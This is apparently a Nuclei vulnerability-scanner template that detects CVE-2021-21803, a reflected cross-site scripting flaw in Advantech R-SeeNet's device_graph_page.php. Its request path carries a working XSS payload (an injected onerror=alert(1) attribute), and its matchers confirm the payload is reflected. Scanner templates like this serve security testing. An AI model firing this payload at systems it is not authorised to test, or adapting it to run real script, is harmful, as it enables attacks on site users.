nuclei-templates/http/cves/2021/CVE-2021-21803.yaml

46 lines
1.2 KiB
YAML

id: CVE-2021-21803
info:
name: Advantech R-SeeNet - Cross-Site Scripting
author: gy741
severity: medium
description: Advantech R-SeeNet is vulnerable to cross-site scripting via the device_graph_page.php script via the is2sim parameter. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution.
reference:
- https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272
- https://nvd.nist.gov/vuln/detail/CVE-2021-21803
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-21803
cwe-id: CWE-79
cpe: cpe:2.3:a:advantech:r-seenet:*:*:*:*:*:*:*:*
epss-score: 0.89019
tags: cve,cve2021,rseenet,xss
metadata:
max-request: 1
http:
- method: GET
path:
- '{{BaseURL}}/php/device_graph_page.php?is2sim=%22zlo%20onerror=alert(1)%20%22'
matchers-condition: and
matchers:
- type: word
words:
- '"zlo onerror=alert(1) "'
- 'Device Status Graph'
part: body
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# Enhanced by mp on 2022/09/02